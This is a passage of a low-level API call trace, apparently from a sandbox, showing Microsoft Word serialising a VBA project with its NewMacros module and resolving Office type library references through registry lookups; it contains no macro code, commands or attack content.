_Value=0x8, _Buffer=0x280f94, _BufferCount=0x7, _Radix=16 | out: _Buffer="8") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x778b818, _SizeInWords=0x8, _Source="*\\R0*#8" | out: _Destination="*\\R0*#8") returned 0x0 [0236.082] IUnknown:Release (This=0x788e200) returned 0x13 [0236.082] wcscpy_s (in: _Destination=0x280f88, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0236.082] _ultow_s (in: _Value=0x0, _Buffer=0x280f8e, _BufferCount=0xa, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.082] _ultow_s (in: _Value=0x17, _Buffer=0x280f94, _BufferCount=0x7, _Radix=16 | out: _Buffer="17") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x778b818, _SizeInWords=0x9, _Source="*\\R0*#17" | out: _Destination="*\\R0*#17") returned 0x0 [0236.082] IUnknown:Release (This=0x788e200) returned 0x13 [0236.082] wcscpy_s (in: _Destination=0x280f88, _SizeInWords=0xd, _Source="*\\R" | out: _Destination="*\\R") returned 0x0 [0236.082] _ultow_s (in: _Value=0x0, _Buffer=0x280f8e, _BufferCount=0xa, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.082] _ultow_s (in: _Value=0xf, _Buffer=0x280f94, _BufferCount=0x7, _Radix=16 | out: _Buffer="f") returned 0x0 [0236.082] wcscpy_s (in: _Destination=0x778b818, _SizeInWords=0x8, _Source="*\\R0*#f" | out: _Destination="*\\R0*#f") returned 0x0 [0236.082] IUnknown:Release (This=0x788e200) returned 0x13 [0236.083] CExposedStream::Seek () returned 0x0 [0236.083] CExposedStream::Write () returned 0x0 [0236.083] CExposedStream::Seek () returned 0x0 [0236.083] CExposedStream::Write () returned 0x0 [0236.083] CExposedStream::Seek () returned 0x0 [0236.083] CExposedStream::AddRef () returned 0x2 [0236.083] CExposedStream::Write () returned 0x0 [0236.083] CExposedStream::Release () returned 0x1 [0236.083] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.083] CExposedStream::Seek () returned 0x0 [0236.083] CExposedStream::AddRef () returned 0x2 [0236.083] CExposedStream::Write () returned 0x0 [0236.083] CExposedStream::Release () returned 0x1 [0236.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0236.083] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xa) returned 0xbf8e480 [0236.083] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=10, lpMultiByteStr=0xbf8e480, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacros", lpUsedDefaultChar=0x0) returned 10 [0236.083] _mbscpy_s (in: _Dst=0x7fef1070730, _DstSizeInBytes=0x400, _Src=0x7fef102f2c8 | out: _Dst=0x7fef1070730) returned 0x0 [0236.083] _mbscpy_s (in: _Dst=0x7fef107073a, _DstSizeInBytes=0x3f6, _Src=0x7fef102f3c0 | out: _Dst=0x7fef107073a) returned 0x0 [0236.084] _mbscpy_s (in: _Dst=0x7fef1070745, _DstSizeInBytes=0x3eb, _Src=0xbf8e480 | out: _Dst=0x7fef1070745) returned 0x0 [0236.086] _i64toa_s (in: _Value=1, _Buffer=0x280f60, _BufferCount=0x18, _Radix=10 | out: _Buffer="1") returned 0x0 [0236.086] strnlen (_Str="1", _MaxCount=0x18) returned 0x1 [0236.086] _i64toa_s (in: _Value=1, _Buffer=0x280f60, _BufferCount=0x18, _Radix=10 | out: _Buffer="1") returned 0x0 [0236.086] strnlen (_Str="1", _MaxCount=0x18) returned 0x1 [0236.086] _i64toa_s (in: _Value=1, _Buffer=0x280f60, _BufferCount=0x18, _Radix=10 | out: _Buffer="1") returned 0x0 [0236.086] strnlen (_Str="1", _MaxCount=0x18) returned 0x1 [0236.086] _i64toa_s (in: _Value=32, _Buffer=0x280f60, _BufferCount=0x18, _Radix=10 | out: _Buffer="32") returned 0x0 [0236.086] strnlen (_Str="32", _MaxCount=0x18) returned 0x2 [0236.086] _i64toa_s (in: _Value=3, _Buffer=0x280f60, _BufferCount=0x18, _Radix=10 | out: _Buffer="3") returned 0x0 [0236.086] strnlen (_Str="3", _MaxCount=0x18) returned 0x1 [0236.086] CExposedStream::Write () returned 0x0 [0236.086] CExposedStream::Commit () returned 0x0 [0236.093] CExposedStream::Release () returned 0x0 [0236.093] wcscpy_s (in: _Destination=0x2811e0, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0236.093] _ltow_s (in: _Value=2, _Buffer=0x2811ec, _BufferCount=0x3a, _Radix=16 | out: _Buffer="2") returned 0x0 [0236.093] CExposedDocFile::OpenStream () returned 0x80030002 [0236.093] CExposedDocFile::CreateStream () returned 0x0 [0236.093] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.093] CExposedStream::AddRef () returned 0x2 [0236.093] CExposedStream::Release () returned 0x1 [0236.093] qsort (in: _Base=0x400a40, _NumOfElements=0xd, _SizeOfElements=0x8, _PtFuncCompare=0x7fef0dc7d20 | out: _Base=0x400a40) [0236.093] CExposedStream::Write () returned 0x0 [0236.093] CExposedStream::Write () returned 0x0 [0236.093] CExposedStream::Write () returned 0x0 [0236.093] CExposedStream::Commit () returned 0x0 [0236.095] CExposedStream::Release () returned 0x0 [0236.095] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.095] wcscpy_s (in: _Destination=0x2811e0, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0236.095] _ltow_s (in: _Value=3, _Buffer=0x2811ec, _BufferCount=0x3a, _Radix=16 | out: _Buffer="3") returned 0x0 [0236.095] CExposedDocFile::OpenStream () returned 0x80030002 [0236.095] CExposedDocFile::CreateStream () returned 0x0 [0236.095] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.095] CExposedStream::AddRef () returned 0x2 [0236.095] CExposedStream::Release () returned 0x1 [0236.095] CExposedStream::Write () returned 0x0 [0236.095] CExposedStream::Commit () returned 0x0 [0236.096] CExposedStream::Release () returned 0x0 [0236.096] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.096] CExposedDocFile::CreateStream () returned 0x0 [0236.096] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.096] CExposedStream::AddRef () returned 0x2 [0236.096] CExposedStream::Release () returned 0x1 [0236.097] wcscpy_s (in: _Destination=0x7fef1070736, _SizeInWords=0x1fd, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0236.097] CExposedStream::Write () returned 0x0 [0236.097] CExposedStream::Write () returned 0x0 [0236.097] CExposedStream::Write () returned 0x0 [0236.097] CExposedStream::Commit () returned 0x0 [0236.129] CExposedDocFile::CreateStream () returned 0x0 [0236.129] CExposedStream::AddRef () returned 0x2 [0236.130] CExposedStream::Write () returned 0x0 [0236.130] CExposedStream::Release () returned 0x1 [0236.130] SysStringByteLen (bstr="") returned 0x0 [0236.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0236.130] SysStringByteLen (bstr="") returned 0x0 [0236.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=1, lpWideCharStr=0x778b728, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0236.130] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2810d0 | out: phkResult=0x2810d0*=0xdea) returned 0x0 [0236.130] RegOpenKeyW (in: hKey=0xdea, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x2810c8 | out: phkResult=0x2810c8*=0xdee) returned 0x0 [0236.130] RegEnumKeyW (in: hKey=0xdee, dwIndex=0x0, lpName=0x2810f8, cchName=0xa | out: lpName="1.0") returned 0x0 [0236.130] RegEnumKeyW (in: hKey=0xdee, dwIndex=0x1, lpName=0x2810f8, cchName=0xa | out: lpName="2.0") returned 0x0 [0236.131] wcscpy_s (in: _Destination=0x2810e0, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0236.131] RegOpenKeyW (in: hKey=0xdee, lpSubKey="2.0", phkResult=0x281188 | out: phkResult=0x281188*=0xdf2) returned 0x0 [0236.131] _ultoa_s (in: _Val=0x0, _DstBuf=0x281100, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0236.131] RegOpenKeyA (in: hKey=0xdf2, lpSubKey="0", phkResult=0x2810f0 | out: phkResult=0x2810f0*=0xdf6) returned 0x0 [0236.131] RegOpenKeyW (in: hKey=0xdf6, lpSubKey="win64", phkResult=0x2810f8 | out: phkResult=0x2810f8*=0xdfa) returned 0x0 [0236.131] RegCloseKey (hKey=0xdfa) returned 0x0 [0236.131] RegCloseKey (hKey=0xdf6) returned 0x0 [0236.131] _ultow_s (in: _Value=0x0, _Buffer=0x281190, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.131] RegOpenKeyW (in: hKey=0xdf2, lpSubKey="0", phkResult=0x281168 | out: phkResult=0x281168*=0xdf6) returned 0x0 [0236.132] RegQueryValueW (in: hKey=0xdf6, lpSubKey="win64", lpData=0x2811b0, lpcbData=0x281164 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x281164) returned 0x0 [0236.132] wcscpy_s (in: _Destination=0x281430, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0236.132] RegCloseKey (hKey=0xdf6) returned 0x0 [0236.132] RegCloseKey (hKey=0xdf2) returned 0x0 [0236.132] RegCloseKey (hKey=0xdee) returned 0x0 [0236.132] RegCloseKey (hKey=0xdea) returned 0x0 [0236.132] ITypeLib:RemoteGetDocumentation (in: This=0x72df850, index=-1, refPtrFlags=0x281800, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0236.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0236.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=6, lpMultiByteStr=0x281290, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 6 [0236.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=94, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 94 [0236.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", cchWideChar=94, lpMultiByteStr=0x2812d0, cbMultiByte=94, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation", lpUsedDefaultChar=0x0) returned 94 [0236.132] wcsncpy_s (in: _Destination=0x281490, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0236.132] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x2813c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0236.133] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0236.133] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0236.133] SysStringByteLen (bstr="潎浲污") returned 0x6 [0236.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x778b728, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=6, lpMultiByteStr=0x281290, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 6 [0236.133] wcscpy_s (in: _Destination=0x7fef1070736, _SizeInWords=0x1fd, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x2812d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormal", lpUsedDefaultChar=0x0) returned 9 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0236.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x2812d0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormal", lpUsedDefaultChar=0x0) returned 9 [0236.133] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2810d0 | out: phkResult=0x2810d0*=0xdea) returned 0x0 [0236.133] RegOpenKeyW (in: hKey=0xdea, lpSubKey="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", phkResult=0x2810c8 | out: phkResult=0x2810c8*=0xdf2) returned 0x0 [0236.133] RegEnumKeyW (in: hKey=0xdf2, dwIndex=0x0, lpName=0x2810f8, cchName=0xa | out: lpName="2.6") returned 0x0 [0236.134] RegEnumKeyW (in: hKey=0xdf2, dwIndex=0x1, lpName=0x2810f8, cchName=0xa | out: lpName="2.7") returned 0x0 [0236.134] RegEnumKeyW (in: hKey=0xdf2, dwIndex=0x2, lpName=0x2810f8, cchName=0xa | out: lpName="2.8") returned 0x0 [0236.134] wcscpy_s (in: _Destination=0x2810e0, _SizeInWords=0xa, _Source="2.8" | out: _Destination="2.8") returned 0x0 [0236.134] RegOpenKeyW (in: hKey=0xdf2, lpSubKey="2.8", phkResult=0x281188 | out: phkResult=0x281188*=0xdfa) returned 0x0 [0236.134] _ultoa_s (in: _Val=0x0, _DstBuf=0x281100, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0236.134] RegOpenKeyA (in: hKey=0xdfa, lpSubKey="0", phkResult=0x2810f0 | out: phkResult=0x2810f0*=0xe02) returned 0x0 [0236.134] RegOpenKeyW (in: hKey=0xe02, lpSubKey="win64", phkResult=0x2810f8 | out: phkResult=0x2810f8*=0xe0a) returned 0x0 [0236.135] RegCloseKey (hKey=0xe0a) returned 0x0 [0236.135] RegCloseKey (hKey=0xe02) returned 0x0 [0236.135] _ultow_s (in: _Value=0x0, _Buffer=0x281190, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.135] RegOpenKeyW (in: hKey=0xdfa, lpSubKey="0", phkResult=0x281168 | out: phkResult=0x281168*=0xdfe) returned 0x0 [0236.135] RegQueryValueW (in: hKey=0xdfe, lpSubKey="win64", lpData=0x2811b0, lpcbData=0x281164 | out: lpData="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL", lpcbData=0x281164) returned 0x0 [0236.135] wcscpy_s (in: _Destination=0x281430, _SizeInWords=0x104, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0236.135] RegCloseKey (hKey=0xdfe) returned 0x0 [0236.135] RegCloseKey (hKey=0xdfa) returned 0x0 [0236.136] RegCloseKey (hKey=0xdf2) returned 0x0 [0236.136] RegCloseKey (hKey=0xdea) returned 0x0 [0236.136] ITypeLib:RemoteGetDocumentation (in: This=0x788df30, index=-1, refPtrFlags=0x281800, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Office", cchWideChar=6, lpMultiByteStr=0x281290, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office", lpUsedDefaultChar=0x0) returned 6 [0236.136] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x80) returned 0x56e3d40 [0236.136] _ultow_s (in: _Value=0x2, _Buffer=0x28157a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0236.136] _ultow_s (in: _Value=0x0, _Buffer=0x28157e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.136] _ultow_s (in: _Value=0x0, _Buffer=0x281582, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.136] wcscpy_s (in: _Destination=0x79d4d78, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0236.136] wcscpy_s (in: _Destination=0x79d4d7e, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0236.136] wcscpy_s (in: _Destination=0x79d4dca, _SizeInWords=0x6c, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0236.136] wcscpy_s (in: _Destination=0x79d4dd8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0236.136] wcscpy_s (in: _Destination=0x79d4e58, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0236.136] IMalloc:Free (This=0x7fefe9e5380, pv=0x56e3d40) [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=148, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 148 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchWideChar=148, lpMultiByteStr=0x2812d0, cbMultiByte=148, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.0#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", lpUsedDefaultChar=0x0) returned 148 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ThisDocument", cchWideChar=12, lpMultiByteStr=0x281370, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ThisDocument", lpUsedDefaultChar=0x0) returned 12 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0236.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NewMacros", cchWideChar=9, lpMultiByteStr=0x281370, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NewMacrosent", lpUsedDefaultChar=0x0) returned 9 [0236.137] CExposedStream::Write () returned 0x0 [0236.137] CExposedStream::Release () returned 0x0 [0236.137] CExposedStream::Release () returned 0x0 [0236.137] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.137] wcscpy_s (in: _Destination=0x281820, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0236.137] _ltow_s (in: _Value=0, _Buffer=0x28182c, _BufferCount=0x3a, _Radix=16 | out: _Buffer="0") returned 0x0 [0236.137] CExposedDocFile::OpenStream () returned 0x80030002 [0236.137] CExposedDocFile::CreateStream () returned 0x0 [0236.137] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.137] CExposedStream::AddRef () returned 0x2 [0236.137] CExposedStream::Release () returned 0x1 [0236.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\CNormal", cchWideChar=9, lpMultiByteStr=0x2813f0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\CNormalQË\n", lpUsedDefaultChar=0x0) returned 9 [0236.138] wcsncpy_s (in: _Destination=0x27fe30, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0236.138] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0236.138] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x27fd60, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0236.138] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0236.138] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x408) returned 0x7a5f040 [0236.138] CExposedStream::Write () returned 0x0 [0236.138] CExposedStream::Write () returned 0x0 [0236.138] CExposedStream::Write () returned 0x0 [0236.138] CExposedStream::Commit () returned 0x0 [0236.140] CExposedStream::Release () returned 0x0 [0236.140] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.140] wcscpy_s (in: _Destination=0x2817d0, _SizeInWords=0x40, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0236.140] _ltow_s (in: _Value=1, _Buffer=0x2817dc, _BufferCount=0x3a, _Radix=16 | out: _Buffer="1") returned 0x0 [0236.140] CExposedDocFile::OpenStream () returned 0x80030002 [0236.140] CExposedDocFile::CreateStream () returned 0x0 [0236.140] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x420) returned 0xbd50760 [0236.140] CExposedStream::AddRef () returned 0x2 [0236.140] CExposedStream::Release () returned 0x1 [0236.140] CExposedStream::Write () returned 0x0 [0236.140] CExposedStream::Commit () returned 0x0 [0236.142] CExposedStream::Release () returned 0x0 [0236.142] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd50760) [0236.142] IMalloc:Free (This=0x7fefe9e5380, pv=0xc159280) [0236.142] IMalloc:Free (This=0x7fefe9e5380, pv=0xc061c90) [0236.142] CExposedDocFile::Release () returned 0x0 [0236.142] CExposedDocFile::CreateStream () returned 0x0 [0236.142] lstrlenA (lpString="ThisDocument") returned 12 [0236.142] lstrlenA (lpString="ThisDocument") returned 12 [0236.142] CExposedStream::Write () returned 0x0 [0236.142] CExposedStream::Write () returned 0x0 [0236.142] lstrlenA (lpString="NewMacros") returned 9 [0236.142] lstrlenA (lpString="NewMacros") returned 9 [0236.142] CExposedStream::Write () returned 0x0 [0236.142] CExposedStream::Write () returned 0x0 [0236.142] CExposedStream::Write () returned 0x0 [0236.142] CExposedStream::Seek () returned 0x0 [0236.142] CExposedStream::SetSize () returned 0x0 [0236.142] CExposedStream::Release () returned 0x0 [0236.142] lstrcpyA (in: lpString1=0xa39c4dc, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0236.142] CExposedDocFile::Stat () returned 0x0 [0236.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa39c4dc, cbMultiByte=-1, lpWideCharStr=0x281eb0, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0236.142] CExposedDocFile::CreateStream () returned 0x0 [0236.142] CExposedDocFile::AddRef () returned 0x2 [0236.142] wsprintfA (in: param_1=0x281750, param_2="%s=\"" | out: param_1="ID=\"") returned 4 [0236.142] lstrcatA (in: lpString1="ID=\"", lpString2="{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}" | out: lpString1="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}") returned="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}" [0236.142] lstrcatA (in: lpString1="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}", lpString2="\"\r\n" | out: lpString1="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}\"\r\n") returned="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}\"\r\n" [0236.142] lstrlenA (lpString="ID=\"{36C7204D-13D4-4751-BBC5-F79D80FB6CEF}\"\r\n") returned 45 [0236.142] wsprintfA (in: param_1=0x281470, param_2="%s=" | out: param_1="Document=") returned 9 [0236.143] lstrlenA (lpString="Document=") returned 9 [0236.143] lstrlenA (lpString="ThisDocument") returned 12 [0236.143] lstrlenA (lpString="ThisDocument") returned 12 [0236.143] wsprintfA (in: param_1=0x281485, param_2="/&H%08lX\r\n" | out: param_1="/&H00000000\r\n") returned 13 [0236.143] lstrlenA (lpString="Document=ThisDocument/&H00000000\r\n") returned 34 [0236.143] wsprintfA (in: param_1=0x281470, param_2="%s=" | out: param_1="Module=") returned 7 [0236.143] lstrlenA (lpString="Module=") returned 7 [0236.143] lstrlenA (lpString="NewMacros") returned 9 [0236.143] lstrlenA (lpString="NewMacros") returned 9 [0236.143] strcpy_s (in: _Dst=0x281480, _DstSize=0x202, _Src="\r\n" | out: _Dst="\r\n") returned 0x0 [0236.143] lstrlenA (lpString="Module=NewMacros\r\n") returned 18 [0236.143] wsprintfA (in: param_1=0x281750, param_2="%s=\"" | out: param_1="Name=\"") returned 6 [0236.143] lstrlenA (lpString="Name=\"") returned 6 [0236.143] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x778b818, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0236.143] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0236.143] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 